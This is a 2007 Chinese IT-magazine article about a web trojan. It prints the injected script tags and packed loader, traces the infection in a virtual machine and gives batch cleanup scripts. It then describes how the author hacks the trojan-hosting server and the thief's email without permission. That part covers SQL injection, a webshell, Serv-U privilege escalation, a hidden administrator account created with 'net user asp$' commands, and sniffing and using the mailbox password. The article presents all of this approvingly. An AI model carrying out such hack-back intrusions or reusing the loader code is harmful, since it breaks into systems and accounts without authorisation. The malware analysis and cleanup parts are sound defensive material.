说互联网上到处是“马窝”、“毒窟”,你信吗?不信?我们就来个现场直播!上演一场以毒攻毒,直捣“毒窝”的攻坚战,出发......
一、陷入毒窝
我们在Google中搜索资料的时候,经常会看到这样的搜索结果“该网站可能含有恶意软件,有可能会危害您的电脑。”或者“继续访问 http://www.*.com,但风险自担。”这是Google以自己的方式对网页安全性分析的结果。我们没有理由怀疑Google的技术,这是它在以自己的方式告诉我们“这是个毒窝”。以“不入虎穴,焉得虎子”的英勇,我们就去探探虎穴。
测试环境说明:一安装有Windows XP的虚拟机,没有打补丁包,没有安装杀毒软件和防火墙。
1.探毒
第一步:下载网页
(为了不至于“出师未捷,而光荣牺牲。”我先把挂马的网页下载下来。看看到底用了什么网马,怎么挂的?)用迅雷很快地把挂了马的网页下载下来。
第二步:分析网页代码
用记事本打开网页查看源代码,通过分析,发现挂马者在该网站的首页的开头和尾部都加入了如下的代码:
<SCRIPT language=javascript>
window.open ("http://www.*.com/1.htm","","toolbar=no,location=no,directories=no,status=no,menubar=no,scro llbars=no,width=1,height=1"); </script>
这是一个用javascript脚本木马的代码,其中的http://www.*.com/1.htm应该是网页木马的地址。
第三步:继续用迅雷下载http://www.*.com/1.htm,用记事本打开,代码如下:
<script language=javascript src="http://my.*.com/admin.js>";</script>
这是一个木马脚本,通过脚本调用了一个js文件。
第四步:用迅雷下载admin.js文件,用记事本打开,部分代码如下:
eval(function(p,a,c,k,e,d);if(!"".replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function();c=1;};while(c--)if(k[c])p=p.replace(new RegExp("b"+e(c)+"b","g"),k[c]);return p;}("Z("ltgfKdbQutcqjL(中间省去n多......)feipbOxdgbQgjoO")",62,68,"145|40|164|42|56|141|156|162|73|143|144|51|155|50|160|157|151|154|54|75|123|146|163|47|61|60|142|170|53|165|166|106|103|150|117|152|101|57|171|167|55|105|124|102|66|63|147|115|71|65|175|120|173|62|121|72|134|104|107|176|52|eval|114|110|127|70|64|130".split("|"),0,{}))
很明显这个网马加密并且编译了,通过Google查询这应该是冰狐的网马。
2.试毒:用虚拟机器的浏览器中打开被挂马的网页地址,有一个小窗口突然闪了一下消失了,网页迟迟不能打开,桌面任务栏上的网络连接图表突然长亮,硬盘狂响,应该是在往硬盘上下载什么。不管什么了,我不入地狱,谁入地狱?大概20秒钟好像木马好像已经下载完毕并运行了。
二、刮骨疗伤
木马入驻系统后对几个关键的地方进行查看。
刮骨:
1.任务管理器:
运行任务管理器,通过和以前的进程对比发现多了lexplore.exe、SVCH0ST.EXE(0是数字)两个未知进程。试着结束lexplore.exe进程,可以,但不到五秒钟又出现了。结束SVCH0ST.EXE进程,同样不到一秒也出现了。为什么会这样呢?通过分析发现:原来这两个进程是木马释放的两个文件创建的,构成了双保险,互相监视。当一方的进程被结束,另一方在下一个周期内对进程表进行扫描发现对方不在,就重新创建一个。另外如果有一个文件被删除,Wlgx.dll会重新释放一个(这是后来才发现的)。
2.在搜索最新的文件:
通过“资源管理器”→“工具”→“文件夹选项”→“查看”中设置“显示所有的文件”,运用文件搜索工具搜索今天创建的所有文件。通过对搜索结果的分析发现了几个可疑的文件,它们分别是:
临时目录:%temp%Wl2lexplore.exe)
释放库文件:%temp%Wlgx.dll
系统目录:%systemroot%system32SVCH0ST.EXE %systemroot%system32lexplore.exe
在每个根目录下出现了三个文件:auatorun.inf、lexplore.exe、SVCH0ST.EXE(目的是在打开各个根目录的时候病毒会自动运行。)
注:以上文件都是隐藏、只读、系统文件。
3.注册表中新添加的项目
[HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRun]
"myWl2"="%temp%Wl2lexplore.exe"
[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogon]
"Shell"="EXPLORER.EXE,SVCH0ST.EXE"
4.服务管理器
运行服务管理器通过对比发现多了两个可疑的项目:
服务名称:SVCH0ST
显示名称:SVCHOST
描述:系统网络服务组件
可执行文件的路径:c:Windowssystem32SVCH0ST.EXE
启动类型:自动
服务状态:启动
服务名称:lexplore.exe
显示名称:lexplore.exe
描述:网络浏览辅助
可执行文件的路径:c:Windowssystem32lexplore.exe
启动类型:自动
服务状态:启动
共2页。 12:
作者: 甘肃/老五, 出处:IT专家网, 责任编辑: 张帅, 2007-12-21 08:52
如今互联网上木马病毒十分猖獗,您一不小心就可能深陷病毒的泥潭,如何及时发现并对这种恼人的网络威胁宣战?如何避免用户的信息安全呢?本文将详细介绍……
疗伤:
1.结束进程:由于这两个进程直接互相保护,只能采取非常规的办法,用批处理,代码如下:
@echo off
taskkill /f /im SVCH0ST.EXE
copy c:Windows otepad.exe c:Windowssystem32SVCH0ST.EXE
taskkill /f /im lexplore.exe
del c:Windowssystem32SVCH0ST.EXE
del c:Windowssystem32lexplore.exe
exit
说明:(1).由于两个进程之间互相保护,大概每隔五秒钟就扫描一次进程,如果用手工的方法太慢,没有等把源文件删除,木马的进程已经被创建出来,就无法删除源文件。(2).代码第三行在SVCHOST.EXE进程被结束掉后,用notepad.exe(记事本)程序替换木马程序,那么当lexplore.exe进程发现SVCH0ST.EXE进程被结束重新创建的该进程,其实就是打开了记事本程序。那么现在结束lexplore.exe进程,就不会有真正的SVCH0ST.EXE保护了。
2.删除病毒文件:两个系统目录下的病毒文件被删除,其它地方的病毒我们同样用批处理,代码如下:
@echo off
del %temp%Wl2lexplore.exe
del %temp%Wlgx.dll
cd
attrib -a -s -h autorun.inf
attrib -a -s -h lexplore.exe
attrib -a -s -h SVCH0ST.EXE
del autorun.inf
del lexplore.exe
del SVCH0ST.EXE
d:
attrib -a -s -h autorun.inf
attrib -a -s -h lexplore.exe
attrib -a -s -h SVCH0ST.EXE
del autorun.inf
del lexplore.exe
del SVCH0ST.EXE
注:我的虚拟机只有两个分区,为了下面的木马分析,我保存了lexplore.exe、SVCH0ST.EXE、Wlgx.dll木马文件。
三、深入毒窝
文章写到这里,突然有个想法,进入毒窟看看!试试能否进入那台挂马者放置木马文件主机。
这是一台web服务器,先旁注看看目标还有什么站,结果发现是一个商业站点,只有一个站,主机是独立的。不管那么多,开着X-Scan扫描一下再说,接着去问问“Google”,看看到底是个什么站。关键字输入:http://www.*.com(安全原因,用了*)结果什么也没有出来,点击下面的“寻找网页包含有www.*.com”,出现了不该看到的结果。这些网站都被插入了木马,真可怜,稍微整理了一下搜索结果,除去有些站长求助的帖子外,足有30多个不同的站点被插入了恶意代码!而且都是国内的站点。先不管了,看看我的扫描结果,目标开了21.80.3389端口。21的FTP连接不上,80是网址服务器,3389是默认的终端服务器,先3389连接看看,过了N久才连接上,速度特慢。尝试了几个弱密码均告失败。去http://www.ip138.com看了一下,填上Ping出来的ip地址,才发现是深圳网通的主机,和笔者所在地区相隔太远,怪不得这么慢。
换个思路,试试为web注入,千辛万苦找到一个注入点,获取管理员账户和密码,扫描得到网站后台,登录进入后台,通过“备份数据库”得到一个webshell。试试cmd,可以执行,但权限太低。对方开来ftp应该安装有ftp软件。果然在“c:Program Files”中看到了Serv-U,著名的Serv-U漏洞大家都知道吧!试试提权,不成功!上传一个ftp提取工具,再试成功。可以马上创建一个管理员用户:
net user asp$ "test" /add
net localgroup administrators asp$ /add
389远程登录,大概看了一下帮管理员清除了网马,留言提示管理员修补漏洞,撤人。
四、还治其人
通过分析SVCH0ST.EXE是木马的主程序,运用查壳工具发现加了壳,马上脱壳。用十六进制编辑器WinHex打开脱壳后的木马,估计是个QQ尾巴木马,这样的木马是用来盗取QQ的,一般把盗取的QQ号和密码发到指定的邮箱,或者ftp服务器的一个文件中。以http、www搜索,没有结果,看来它不是用ftp文件形式存放QQ号和密码的。再以@*.com搜索,终于看到了一个邮箱地址*@gmail.com(安全原因,用了*),查找密码,没有发现,一定是加密了。一般这样的木马在配置的时候必须要填入邮箱密码,不然不能发送邮件。我们先打开嗅探工具,我用的是WSockExpert,设置对于SVCH0ST.EXE的网络数据进行嗅探。接着运行QQ输入用户名和密码登录,登录成功,这期间看见WSockExpert再不断地抓包,大概再QQ登录后一分钟停止嗅探。通过对数据包的分析很快找到了邮箱密码,因为是明文,所有很好找。马上登录邮箱,成功了!好家伙,竟然盗了这么多,我的QQ号和密码赫然其中!怎么办?改了他的邮箱密码吗?算了,删了与QQ相关的邮件,另外用邮箱自发一个警告邮件!
结束语:这次“攻毒”行动,虽有波折,但还算顺利。用两句话来结束这篇文章:我不入地狱,谁人地狱?我入地狱,为了你们不入地狱!
IT专家网原创文章,未经许可,严禁转载!